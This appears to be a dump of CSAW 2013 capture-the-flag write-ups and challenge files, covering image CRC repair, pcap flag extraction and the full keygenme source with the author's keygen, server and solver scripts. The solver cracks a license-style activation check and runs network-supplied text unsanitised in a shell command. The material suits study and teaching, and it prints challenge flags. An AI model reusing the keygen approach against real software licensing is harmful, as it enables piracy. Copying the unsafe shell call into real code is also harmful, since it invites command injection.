22 | Editing the CRC for the PNG in `hexedit` to the correct one, yields a valid PNG:
23 |
24 | 
25 | 
26 | 
27 |
28 | The picture looks like it has been resized, however, given the unusual aspect ratio of `3264:1681 ~= 1.94:1`.
29 | We see using `exiftool` that the picture is made with an iPhone 5:
30 |
31 | ```bash
32 | $ exiftool IMG_0707.png
33 | ExifTool Version Number : 9.76
34 | [...]
35 | Source : iPhone 5
36 | Software : 6.1.4
37 | [...]
38 | Image Size : 3264x1681
39 | ```
40 |
41 | The usual ratio of picture made by an [iPhone 5 camera](http://en.wikipedia.org/wiki/IPhone#Screen_and_input) is around `16:9` or `4:3`, so we apply the ratio to the picture using `hexedit` and fix the resulting new CRC sum:
42 |
43 | 
44 | 
45 | ```bash
46 | $ pngcheck NEW.png
47 | NEW.png CRC error in chunk IHDR (computed f754da63, expected fcc410a8)
48 | ERROR: NEW.png
49 | ```
50 | 
51 | 
52 |
53 | The flag is `Key{TheISISPasswordIs}`.
54 | ## Other write-ups and resources
55 |
56 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Life
2 |
3 | **Category:** Misc
4 | **Points:** 300
5 | **Solves:** 212
6 | **Description:**
7 |
8 | >
9 | >
10 | > nc 128.238.66.216 45678
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/life-300/source.txt:
--------------------------------------------------------------------------------
1 | Coming soon! Ping fuzyll if you need it sooner.
2 |
3 | fuzyll@fuzyll.com
4 |
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Networking 1
2 |
3 | **Category:** Misc
4 | **Points:** 50
5 | **Solves:** 1004
6 | **Description:**
7 |
8 | > [networking.pcap](networking.pcap)
9 |
10 | ## Write-up
11 |
12 | We can find the flag in the tcpdump using `strings`:
13 |
14 | ```bash
15 | $ file networking.pcap
16 | networking.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 65535)
17 | $ strings -a networking.pcap | sort | uniq
18 |
19 | )&~
20 | 38400,38400
21 | Login incorrect
22 | Password:
23 | Ubuntu 12.04.2 LTS
24 | XTERM
25 | flag{d316759c281bf925d600be698a4973d5}
26 | hockeyinjune-virtual-machine login:
27 | ```
28 |
29 | The flag is `flag{d316759c281bf925d600be698a4973d5}`.
30 |
31 | ## Other write-ups and resources
32 |
33 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network1-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network1-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Networking 2
2 |
3 | **Category:** Misc
4 | **Points:** 50
5 | **Solves:** 864
6 | **Description:**
7 |
8 | > [networking.pcap](networking.pcap)
9 | >
10 | > [networking.pcap.process](networking.pcap.process)
11 |
12 | ## Write-up
13 |
14 | We are given the same tcpdump as [network1-50](../network1-50/):
15 |
16 | ```bash
17 | $ diff networking.pcap ../network1-50/networking.pcap
18 | $ [...]
19 | ```
20 |
21 | However, we are also given a `networking.pcap.process` file, which contains the flag:
22 |
23 | ```bash
24 | $ strings -a networking.pcap.process | sort | uniq
25 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe
26 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe
27 |
28 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe!
29 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe"
30 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe$
31 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe%
32 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe'
33 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe(
34 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe*
35 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe+
36 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe-
37 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe/
38 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe0
39 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe1
40 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe2
41 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe3
42 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe5
43 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe7
44 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe8
45 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe:
46 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe;
47 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe<
48 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe=
49 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe?
50 | ```
51 |
52 | The flag is `flag{f9b43c9e9c05be5e08ea163007af5144}`.
53 |
54 | ## Other write-ups and resources
55 |
56 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap
--------------------------------------------------------------------------------
/csaw-quals-2013/misc/network2-50/networking.pcap.process:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap.process
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: bikinibonanza
2 |
3 | **Category:** Reversing
4 | **Points:** 150
5 | **Solves:** 316
6 | **Description:**
7 |
8 | > [bikinibonanza.exe](bikinibonanza.exe)
9 | >
10 | > If your key isn't working PM ColdHeat on IRC
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: crackme
2 |
3 | **Category:** Reversing
4 | **Points:** 300
5 | **Solves:** 174
6 | **Description:**
7 |
8 | > nc 128.238.66.218 54321
9 | >
10 | > [crackme](crackme)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/crackme-300/crackme:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/crackme-300/crackme
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 1
2 |
3 | **Category:** Reversing
4 | **Points:** 100
5 | **Solves:** 644
6 | **Description:**
7 |
8 | > [csaw2013reversing1.exe](csaw2013reversing1.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 2
2 |
3 | **Category:** Reversing
4 | **Points:** 200
5 | **Solves:** 357
6 | **Description:**
7 |
8 | > [csaw2013reversing2.exe](csaw2013reversing2.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/dotnet-100/DotNetReversing.exe
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/dotnet-100/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: DotNet
2 |
3 | **Category:** Reversing
4 | **Points:** 100
5 | **Solves:** 662
6 | **Description:**
7 |
8 | > [DotNetReversing.exe](DotNetReversing.exe)
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Impossible
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Solves:** 82
6 | **Description:**
7 |
8 | > WTF, his hp is over 9000! Beat the game to get your key.
9 | >
10 | > [impossible.nds](impossible.nds)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/impossible-500/impossible.nds:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/impossible-500/impossible.nds
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Keygenme
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Solves:** 100
6 | **Description:**
7 |
8 | > nc 128.238.66.219 14549
9 |
10 | ## Write-up
11 |
12 | (TODO)
13 |
14 | ## Other write-ups and resources
15 |
16 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source.txt:
--------------------------------------------------------------------------------
1 | From: http://github.com/crowell/keygenme
2 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/README.md:
--------------------------------------------------------------------------------
1 | keygenme
2 | ========
3 |
4 | keygenme challenge from csaw ctf 2013
5 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/cpu.h:
--------------------------------------------------------------------------------
1 | #ifndef __CPU__
2 | #define __CPU__
3 | #include
4 | #include "instruction.h"
5 | #define NUM_REG 32
6 | #define MEM_SIZE 8196
7 | class cpu
8 | {
9 | typedef unsigned int uint;
10 | typedef unsigned char uchar;
11 | public:
12 | cpu();
13 | cpu(std::string Code, std::string UserKey, std::string FullString);
14 | ~cpu();
15 | void Execute();
16 | uint GetT6();
17 | uint GetT7();
18 |
19 | private:
20 | uint R[NUM_REG]; //32
21 | uint Hi;
22 | uint Lo;
23 | uchar Memory[MEM_SIZE];
24 | uint Pc;
25 | instruction instr;
26 | std::string Code;
27 | std::string UserKey;
28 | uint hexval(char ch);
29 | uint hextoint(std::string hex);
30 | instruction interpretinstruction();
31 | void FillMemory(std::string UserKey, std::string FullString);
32 | };
33 | #endif
34 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/encrypt.asm:
--------------------------------------------------------------------------------
1 | add $t1, $zero, $zero# clear out $t1 ; 00004820
2 | addi $t1, $t1, 0x9e# TEA magic is 0x9e3779b7 ; 2129009E
3 | sll $t1, $t1, 8# shift out making room in the bottom 4; 00094a00
4 | addi $t1, $t1, 0x37 ; 21290037
5 | sll $t1, $t1, 8 ; 00094a00
6 | addi $t1, $t1, 0x79 ; 21290079
7 | sll $t1, $t1, 8 ; 00094a00
8 | addi $t1, $t1, 0xb9 # now $t1 holds the magic 0x9e3779b9 ; 212900b9
9 | add $t2, $zero, $zero# $t2 is the counter ; 00005020
10 | add $t0, $zero, $zero# $t0 is the sum ; 00004020
11 | lw $t8, $zero, 8# k0 mem[8-23] = k ; 8c180008
12 | lw $s7, $zero, 12# k1 ; 8C17000C
13 | lw $s6, $zero, 16# k2 ; 8C160010
14 | lw $t3, $zero, 20# k3 now our keys are in registers ; 8c0b0014
15 | lw $t7, $zero, 0# v0 mem[0-7] = v ; 8c0f0000
16 | lw $t6, $zero, 4# v1, our plaintext is in the registers ; 8c0e0004
17 | loop: add $t0, $t0, $t1# sum+=delta ; 01094020
18 | sll $s4, $t6, 4# (v1 << 4) ; 000ea100
19 | add $s4, $s4, $t8# +k0 part 1 is in s4 ; 0298a020
20 | add $s3, $t6, $t0# (v1 + sum) part 2 is in s3 ; 01c89820
21 | srl $s2, $t6, 5# (v1 >> 5) ; 000e9142
22 | add $s2, $s2, $s7# +k1, now do the xors part 3 in s2 ; 02579020
23 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 02728826
24 | xor $s1, $s1, $s4# xor 1(2,3) ; 2348826
25 | add $t7, $t7, $s1# done with line 2 of the tea loop ; 01f17820
26 | sll $s4, $t7, 4# (v0 << 4) ; 000fa100
27 | add $s4, $s4, $s6# +k2 part 1 in s4 ; 0296a020
28 | add $s3, $t7, $t0# (v0 + sum) part 2 in s3 ; 01e89820
29 | srl $s2, $t7, 5# (v0 >> 5) ; 000f9142
30 | add $s2, $s2, $t3# +k3 part 2 in s2 ; 024b9020
31 | xor $s1, $s2, $s3# xor 2 and 3 parts ; 2728826
32 | xor $s1, $s1, $s4# xor 1(2,3) ; 2348826
33 | add $t6, $t6, $s1# done with line 2! ; 01d17020
34 | addi $s0, $zero, 32# for compare ; 20100020
35 | addi $t2, $t2, 1# the counter ; 214a0001
36 | bne $t2, $s0, 17# bne loop, now save back to the memory ; 15500010
37 | ; here t6 and t7 are the two values we need :-)
38 |
39 |
40 |
41 | 00004820
42 | 2129009E
43 | 00094a00
44 | 21290037
45 | 00094a00
46 | 21290079
47 | 00094a00
48 | 212900b9
49 | 00005020
50 | 00004020
51 | 8c180008
52 | 8C17000C
53 | 8C160010
54 | 8c0b0014
55 | 8c0f0000
56 | 8c0e0004
57 | 01094020
58 | 000ea100
59 | 0298a020
60 | 01c89820
61 | 000e9142
62 | 02579020
63 | 02728826
64 | 02348826
65 | 01f17820
66 | 000fa100
67 | 0296a020
68 | 01e89820
69 | 000f9142
70 | 024b9020
71 | 02728826
72 | 02348826
73 | 01d17020
74 | 20100020
75 | 214a0001
76 | 15500010
77 |
78 | 000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010
79 |
80 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.cpp:
--------------------------------------------------------------------------------
1 | #include "instruction.h"
2 |
3 | instruction::instruction()
4 | {
5 | }
6 |
7 | instruction::instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
8 | uint shift, uint funct, uint address)
9 | {
10 | this->opcode = opcode;
11 | this->rs = rs;
12 | this->rt = rt;
13 | this->rd = rd;
14 | this->immediate = immediate;
15 | this->shift = shift;
16 | this->funct = funct;
17 | this->address = address;
18 | }
19 |
20 | instruction::~instruction()
21 | {
22 | }
23 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/instruction.h:
--------------------------------------------------------------------------------
1 | #ifndef __INSTRUCTION__
2 | #define __INSTRUCTION__
3 | #include
4 |
5 | class instruction
6 | {
7 | typedef unsigned int uint;
8 | public:
9 | instruction();
10 | instruction(uint opcode, uint rs, uint rt, uint rd, uint immediate,
11 | uint shift,uint funct, uint address);
12 | ~instruction();
13 | uint opcode;
14 | uint rs;
15 | uint rt;
16 | uint rd;
17 | uint immediate;
18 | uint shift;
19 | uint funct;
20 | uint address;
21 | };
22 |
23 | #endif
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/keygenme.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include "cpu.h"
5 | using namespace std;
6 | typedef unsigned int uint;
7 | typedef unsigned char uchar;
8 | void printusage(char*);
9 | void printconstraints(char*);
10 | bool check(int, int, int, int);
11 | int main(int argc, char** argv)
12 | {
13 | if(argc < 4)
14 | {
15 | printusage(argv[0]);
16 | exit(1);
17 | }
18 | int namelen = strlen(argv[1]);
19 | if(namelen < 16)
20 | {
21 | printconstraints(argv[1]);
22 | exit(1);
23 | }
24 | int tok1 = strtoul(argv[2], NULL, 0);
25 | int tok2 = strtoul(argv[3], NULL, 0);
26 | std::string username(argv[1]);
27 | std::string fullkey = std::string(username.rbegin(), username.rend());
28 | cpu* libdrm = new cpu("000048202129009E00094a002129003700094a002129007900094a00212900b900005020000040208c1800088C17000C8C1600108c0b00148c0f00008c0e000401094020000ea1000298a02001c89820000e914202579020027288260234882601f17820000fa1000296a02001e89820000f9142024b9020027288260234882601d1702020100020214a000115500010", username, fullkey);
29 | libdrm->Execute();
30 | uint t6 = libdrm->GetT6();
31 | uint t7 = libdrm->GetT7();
32 | delete libdrm;
33 | if(check(t6, t7, tok1, tok2))
34 | {
35 | std::cout << "*<:-)" << std::endl;
36 | }
37 | else
38 | {
39 | std::cout << ":-(" << std::endl;
40 | }
41 | return 0;
42 | }
43 |
44 | bool check(int t6, int t7, int tok1, int tok2)
45 | {
46 | uint temp1 = tok1 ^ 0x31333337;
47 | uchar ch1 = ((tok2 & 0xFF000000) >> 24);
48 | uchar ch2 = ((tok2 & 0x00FF0000) >> 16);
49 | uchar ch3 = ((tok2 & 0x0000FF00) >> 8);
50 | uchar ch4 = (tok2 & 0x000000FF);
51 | uint temp2 = ch2 << 24;
52 | temp2 |= (ch3 << 16);
53 | temp2 |= (ch1 << 8);
54 | temp2 |= (ch4);
55 | if(t6 == temp1 && t7 == temp2)
56 | {
57 | return true;
58 | }
59 | return false;
60 | }
61 |
62 | void printusage(char* progname)
63 | {
64 | std::cout << "usage: " << progname << " " << std::endl;
65 | }
66 |
67 | void printconstraints(char* username)
68 | {
69 | std::cout << "error: " << username << " is not a valid username" << std::endl;
70 | }
71 |
72 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/description.txt:
--------------------------------------------------------------------------------
1 | Reversing : keygenme
2 |
3 | someone has leaked a binary from an activation server.
4 | can you crack the keygen algorithm for me?
5 |
6 | using the ELF provided, reverse the keygeneration algorithm.
7 | The server listening at raxcity.com on port 2000 will ask you for
8 | the passwords of various usernames. If you can provide 10 passwords, you might get a nice flag :-)
9 |
10 | *hint*
11 | Rumor has it that the actual keygen runs in a custom vm. I'd start by decoding the instruction format.
12 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/keygen.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | /***********************************
5 | * Keygenerator for CSAW Challenge *
6 | * Jeffrey Crowell *
7 | * used in solution and server *
8 | ***********************************/
9 |
10 |
11 | typedef unsigned char uchar;
12 | typedef unsigned int uint;
13 | typedef struct keys keys;
14 |
15 | using namespace std;
16 |
17 | //simple pair of uints for returning from encrypt
18 | struct keys
19 | {
20 | uint v0;
21 | uint v1;
22 | };
23 |
24 | //TEA off of the wikipedia page :-)
25 | keys encrypt (uint32_t* v, uint32_t* k) {
26 | uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
27 | uint32_t delta=0x9e3779b9; /* a key schedule constant */
28 | uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
29 | for (i=0; i < 32; i++) { /* basic cycle start */
30 | sum += delta;
31 | v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
32 | v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
33 | } /* end cycle */
34 | keys s = {v0, v1};
35 | return s;
36 | }
37 |
38 |
39 | int main(int argc, char** argv)
40 | {
41 | uint v[2];
42 | uint k[4];
43 | string input(argv[1]);
44 | if(input.length() < 16) //less than 16 chars makes the keys not work
45 | {
46 | cout << "input must be at least 16 characters" << endl;
47 | cout << "you provided only " << input.length() << " characters" << endl;
48 | return 0;
49 | }
50 | v[0] = (input[0] << 24) | (input[1] << 16) | (input[2] << 8) | (input[3]); //fill up the plaintext
51 | v[1] = (input[4] << 24) | (input[5] << 16) | (input[6] << 8) | (input[7]);
52 | string inrev(input.rbegin(), input.rend()); //reverse input
53 | k[0] = (inrev[0] << 24) | (inrev[1] << 16) | (inrev[2] << 8) | (inrev[3]); //fill up the keys
54 | k[1] = (inrev[4] << 24) | (inrev[5] << 16) | (inrev[6] << 8) | (inrev[7]);
55 | k[2] = (inrev[8] << 24) | (inrev[9] << 16) | (inrev[10] << 8) | (inrev[11]);
56 | k[3] = (inrev[12] << 24) | (inrev[13] << 16) | (inrev[14] << 8) | (inrev[15]);
57 | keys s = encrypt(v, k); //encrypt the input under the reverse input
58 | uint temp1 = s.v1 ^ 0x31333337; //this part is just to make it so that it isn't straight TEA as from the vm binary
59 | uchar ch1 = ((s.v0 & 0xFFFFFFFF) >> 24);
60 | uchar ch2 = ((s.v0 & 0x00FF0000) >> 16);
61 | uchar ch3 = ((s.v0 & 0x0000FF00) >> 8);
62 | uchar ch4 = ((s.v0 & 0x000000FF));
63 | uint temp2 = (ch3 << 24) | (ch1 << 16) | (ch2 << 8) | (ch4);
64 | cout << temp1 << " " << temp2 << endl; //print out the keys, for use in the solver and the server
65 | }
66 |
67 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/server.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 | require 'timeout'
3 | require 'securerandom'
4 |
5 | '''
6 | keygenme server for CSAW CTF 2013
7 | Jeffrey Crowell
8 |
9 | Users must get 10 correct serials
10 | within 5 seconds each
11 | '''
12 |
13 |
14 | server = TCPServer.open(2000) # Socket to listen on port 2000
15 | loop { # Servers run forever
16 | Thread.start(server.accept) do |client|
17 | sock_domain, remote_port, remote_hostname, remote_ip = client.peeraddr
18 | puts "connection from #{remote_hostname} #{remote_ip} #{remote_port}"
19 | client.puts "welcome to the activation server\r\n"
20 | (0..9).each{|i|
21 | user = SecureRandom.urlsafe_base64(16)
22 | keys = `./keygen #{user}`.strip
23 | client.puts("give me the password for #{user}")
24 | begin
25 | Timeout::timeout(5) do
26 | pass = client.gets.chomp.strip
27 | if pass == keys
28 | client.puts(":-)")
29 | else
30 | client.puts("wrong password :'-(")
31 | client.close
32 | end
33 | end
34 | rescue Timeout::Error
35 | client.puts("too slow :'-(")
36 | client.close
37 | end
38 | }
39 | client.puts "here's the flag key{vM_k3yg3n_a1n7_n0_th4ng}"
40 | puts "solve from #{remote_hostname} #{remote_ip} #{remote_port}"
41 | client.close # Disconnect from the client
42 | end
43 | }
44 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solver.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 |
3 | """
4 | keygenme solver for CSAW CTF 2013
5 | Jeffrey Crowell
6 | top sekret solution
7 |
8 | """
9 |
10 | host = '128.238.66.219'
11 | port = '14549'
12 | socket = TCPSocket.open(host, port)
13 | s = socket.gets.strip
14 | puts "SERVER: #{s}"
15 | (0..9).each{|i|
16 | s = socket.gets.strip
17 | puts "SERVER: #{s}"
18 | m = s.split(" ")
19 | u = m[-1]
20 | k = `./keygen #{u}`.strip
21 | puts "KEYGEN: #{k}"
22 | socket.puts(k)
23 | s = socket.gets.strip
24 | puts "SERVER: #{s}"
25 | }
26 |
27 | s = socket.gets.strip
28 | puts "FLAG: #{s}"
29 |
30 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme-source/solution/solvertest.rb:
--------------------------------------------------------------------------------
1 | require 'socket'
2 |
3 | """
4 | keygenme solver for CSAW CTF 2013
5 | Jeffrey Crowell
6 | top sekret solution
7 |
8 | """
9 |
10 | host = '128.238.66.219'
11 | port = '111111'
12 | socket = TCPSocket.open(host, port)
13 | s = socket.gets.strip
14 | puts "SERVER: #{s}"
15 | (0..9).each{|i|
16 | s = socket.gets.strip
17 | puts "SERVER: #{s}"
18 | m = s.split(" ")
19 | u = m[-1]
20 | k = `./keygen #{u}`.strip
21 | puts "KEYGEN: #{k}"
22 | socket.puts(k)
23 | s = socket.gets.strip
24 | puts "SERVER: #{s}"
25 | }
26 |
27 | s = socket.gets.strip
28 | puts "FLAG: #{s}"
29 |
30 |
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/keygenme-400/keygenme32.elf
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: Noobs First Firmware Mod
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Solves:** 40
6 | **Description:**
7 |
8 | > N00b firmware modder says: "My first u-boot mod, there might be errors :("
9 | >
10 | > [noobs-first-firmware-mod.tgz](noobs-first-firmware-mod.tgz)
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/noobs-first-firmware-mod-500/noobs-first-firmware-mod.tgz
--------------------------------------------------------------------------------
/csaw-quals-2013/solves.txt:
--------------------------------------------------------------------------------
1 | network1-50 1004
2 | guess-harder-100 985
3 | network2-50 864
4 | black-and-white-100 818
5 | exploit1-100 701
6 | dotnet-100 662
7 | csaw2013reversing1-100 644
8 | csaw2013reversing2-200 357
9 | bikinibonanza-150 316
10 | nevernote-200 307
11 | deeeeeeaaaaaadbeeeeeeeeeef-200 224
12 | life-300 212
13 | exploit2-200 198
14 | crackme-300 174
15 | csawpad-100 141
16 | onlythisprogram-300 127
17 | csawdiary-300 116
18 | keygenme-400 100
19 | widgetcorp-400 99
20 | herpderper-300 89
21 | miteegashun-400 85
22 | impossible-500 82
23 | cryptomatv2-400 45
24 | noobs-first-firmware-mod-500 40
25 | slurp-500 27
26 | scp-hack-500 7
27 |
--------------------------------------------------------------------------------
/csaw-quals-2013/web/cryptomatv2-400/README.md:
--------------------------------------------------------------------------------
1 | # CSAW Quals CTF 2015: CryptoMatv2
2 |
3 | **Category:** Web
4 | **Points:** 400
5 | **Solves:** 45
6 | **Description:**
7 |
8 | > Cryptomat is back! You know the drill. Get the key from Dog.
9 | >
10 | > http://128.238.66.225
11 |
12 | ## Write-up
13 |
14 | (TODO)
15 |
16 | ## Other write-ups and resources
17 |
18 | * none yet
--------------------------------------------------------------------------------
/csaw-quals-2013/web/guess-harder-100/README.md:
--------------------------------------------------------------------------------
